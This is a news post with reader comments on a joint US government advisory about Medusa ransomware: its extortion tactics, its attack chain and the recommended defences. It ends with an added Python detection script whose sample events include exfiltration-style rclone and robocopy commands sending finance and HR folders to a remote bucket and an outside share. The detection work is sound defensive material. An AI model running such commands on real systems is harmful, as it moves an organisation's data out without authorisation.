Cybersecurity Alert Warns of 300 Attacks with 'Medusa' Ransomware (theregister.com)

A ransomware-as-a-service variant called "Medusa" has claimed over 300 victims in "critical infrastructure sectors" (including medical), according to a joint alert from CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC).

And that alert reminds us that Medusa is a globe-spanning operation that recruits third-party affiliates to plant ransomware and negotiate with victims, notes the Register. "Even organizations that have good ransomware recovery regimes, meaning they don't need to unscramble encrypted data as they have good backups and fall-back plans, may consider paying to prevent the release of their stolen data, given the unpleasant consequences that follow information leaks. Medusa actors also set a deadline for victims to pay ransoms and provide a countdown timer that makes it plain when stolen info will be sprayed across the internet. If victims cough up $10,000 in cryptocurrency, the crims push the deadline forward by 24 hours."

The advisory reveals one Medusa actor has taken things a step further. "FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid," the advisory states. That separate actor then "requested half of the payment be made again to provide the 'true decryptor'," the advisory states, describing this incident as "potentially indicating a triple extortion scheme."

The security groups' advisory stresses that they "do not encourage paying ransoms as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations..." (But "Regardless of whether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to promptly report ransomware incidents...")

Besides updating software and operating systems, the alert makes these recommendations for organizations:
  • Require VPNs (or jump hosts) for remote network access
  • Block remote access from unknown/untrusted origins, and disable unused ports
  • Segment networks to help prevent the spread of ransomware
  • Use a network monitoring tool to spot and investigate abnormal activity — including lateral movement (using endpoint detection and response tools). Log all network traffic, and monitor it for unauthorized scanning and access attempts.
  • Create recovery plans with encrypted offline backups of sensitive/proprietary data and servers
  • Require multifactor authentication, use strong (and long) passwords, and "consider not requiring frequently recurring password changes, as these can weaken security." (Also audit access control following the principle of least privilege, and watch for new and/or unrecognized accounts.)
  • Disable command-line and scripting activities and permissions.


Comments:
  • Physical. Layer. Switch.... You're welcome ;-) https://www.printables.com/mod... [printables.com]
    • Thanks. But no thanks. Any decent server can do all that and more.
      • "Thanks. But no thanks. Any decent server can do all that and more." Negative... Servers do not power off unused backup volumes. Aka, not a physical layer of protection. Anything not air gapped, can be infected. Period. A powered down hard drive... CANNOT! ;-)
  • Those "recommendations" are primarily aimed at the mouth-breathing end users who will engage with pretty much any piece of digital garbage in the mistaken belief that they're awesome and fark personal responsibility

    Until we're allowed to fire these chuckledinks, this state of affairs will persist.

  • ...may not always be the solution but some of these scammers could probably benefit from an epic ass whoopin.

    Would love to see a video where these bastards get raided by the cops AND their mothers with belts/chanclas/paddles in hand.

  • DOGE probably fucked cybersecurity investigations team also.

  • Disable command-line and scripting activities and permissions.

    Wait... What?

    • They target Windows machines. Makes sense to deactivate scripting on machines used by the corporate Excel drones.

      Attack chains mounted by the ransomware syndicate involve the exploitation of known security flaws in public-facing applications, mainly Microsoft Exchange Server, to obtain initial access.

      Once gaining a successful foothold, the hackers use remote management and monitoring (RMM) software such as SimpleHelp, AnyDesk, or MeshAgent for persistent access, and employ the tried-and-tested Bring Your Own Vulnerable Driver (BYOVD) technique to terminate antivirus processes using KillAV.

      Some of the other tools deployed over the course of a Medusa ransomware attack include Navicat to access and run database queries, RoboCopy, and Rclone for data exfiltration.
      https://thehackernews.com/2025... [thehackernews.com]

    • by shanen ( 462549 )

      Mod parent up and I am also interested in doing this...
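Added example, not from the advisory, the Register, The Hacker News, or either commenter above: a small Python triage routine that turns the attack chain quoted in the thread (RMM tools for persistence, BYOVD to kill AV, RoboCopy and Rclone for exfiltration) into detection logic over constructed endpoint events. The JSON event format, the host names, the assumption that the RMM products show up as "simplehelp", "anydesk" or "meshagent" in the image path, and the BYOVD heuristic (a kernel driver loaded from outside the system driver directory) are all assumptions for illustration; no specific vulnerable driver name is assumed, since the page names none.

```python
"""Added example: triage of constructed endpoint events for the tooling named in the
Medusa attack chain (RMM persistence, rclone/robocopy exfiltration, BYOVD driver loads).

Assumed event format: one JSON object per line with keys ts, host, type
("process" or "driver_load"), image (full Windows path) and, for processes, cmdline.
"""
import json
import re

# Substrings (lower-cased) assumed to appear in the image path of the RMM tools.
RMM_MARKERS = ("simplehelp", "anydesk", "meshagent")
SYSTEM_DRIVER_DIR = "c:\\windows\\system32\\drivers\\"
COPY_VERBS = {"copy", "sync", "move"}

# Constructed sample events (raw string so the JSON "\\" escapes survive).
SAMPLE_EVENTS = r"""
{"ts":"2025-03-12T10:00:01","host":"WS-042","type":"process","image":"C:\\Windows\\System32\\svchost.exe","cmdline":"svchost.exe -k netsvcs"}
{"ts":"2025-03-12T10:02:10","host":"WS-042","type":"process","image":"C:\\ProgramData\\AnyDesk\\AnyDesk.exe","cmdline":"AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent"}
{"ts":"2025-03-12T10:15:00","host":"WS-042","type":"process","image":"C:\\Users\\Public\\rclone.exe","cmdline":"rclone.exe copy D:\\Finance remote:bucket/x --transfers 32"}
{"ts":"2025-03-12T10:16:00","host":"WS-042","type":"process","image":"C:\\Windows\\System32\\Robocopy.exe","cmdline":"robocopy D:\\HR \\\\203.0.113.5\\share /E"}
{"ts":"2025-03-12T10:17:00","host":"WS-042","type":"process","image":"C:\\Windows\\System32\\Robocopy.exe","cmdline":"robocopy D:\\HR E:\\Backup\\HR /E"}
{"ts":"2025-03-12T10:20:00","host":"WS-042","type":"driver_load","image":"C:\\Users\\Public\\Temp\\drv.sys"}
{"ts":"2025-03-12T10:20:01","host":"WS-042","type":"driver_load","image":"C:\\Windows\\System32\\drivers\\tcpip.sys"}
{"ts":"2025-03-12T10:25:00","host":"SRV-01","type":"process","image":"C:\\Program Files\\Mesh Agent\\MeshAgent.exe","cmdline":"MeshAgent.exe -run"}
"""


def _is_local_path(token):
    """True for a Windows drive path such as D:\\Finance; False for rclone remotes like remote:bucket."""
    return re.match(r"^[A-Za-z]:($|[\\/])", token) is not None


def triage(event):
    """Return (rule, detail) if the event matches one of the chain's TTPs, else None."""
    image = event.get("image", "")
    base = image.rsplit("\\", 1)[-1].lower()

    if event["type"] == "driver_load":
        # BYOVD heuristic (assumption): legitimate drivers live under the system driver directory.
        if not image.lower().startswith(SYSTEM_DRIVER_DIR):
            return ("driver_outside_system_dir", image)
        return None

    if event["type"] != "process":
        return None

    if any(marker in base for marker in RMM_MARKERS):
        return ("rmm_tool", base)

    args = event.get("cmdline", "").split()
    if base == "rclone.exe" and len(args) > 1 and args[1].lower() in COPY_VERBS:
        # An rclone destination with a colon that is not a drive letter is a remote.
        remotes = [a for a in args[2:] if ":" in a and not a.startswith("-") and not _is_local_path(a)]
        if remotes:
            return ("rclone_to_remote", remotes[0])

    if base == "robocopy.exe":
        # Copying to a UNC path (\\host\share) is the exfil-shaped variant; local copies are not flagged.
        unc = [a for a in args[1:] if a.startswith("\\\\")]
        if unc:
            return ("robocopy_to_unc", unc[0])

    return None


def scan(jsonl):
    """Run triage over newline-delimited JSON events; return [(host, rule, detail), ...]."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        result = triage(event)
        if result:
            hits.append((event["host"],) + result)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Two design points worth noting. Matching RMM software by name is only a first pass: AnyDesk and MeshAgent are legitimate products, so the finding means "unexpected remote-access tool appeared", to be checked against what the organisation actually deploys. And the driver heuristic is deliberately broad, because BYOVD by definition uses a signed, otherwise-legitimate driver; the signal is where it was loaded from and what process dropped it, not the file itself.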

"Regardless of the legal speed limit, your Buick must be operated at speeds faster than 85 MPH (140kph)." -- 1987 Buick Grand National owners manual.

Working...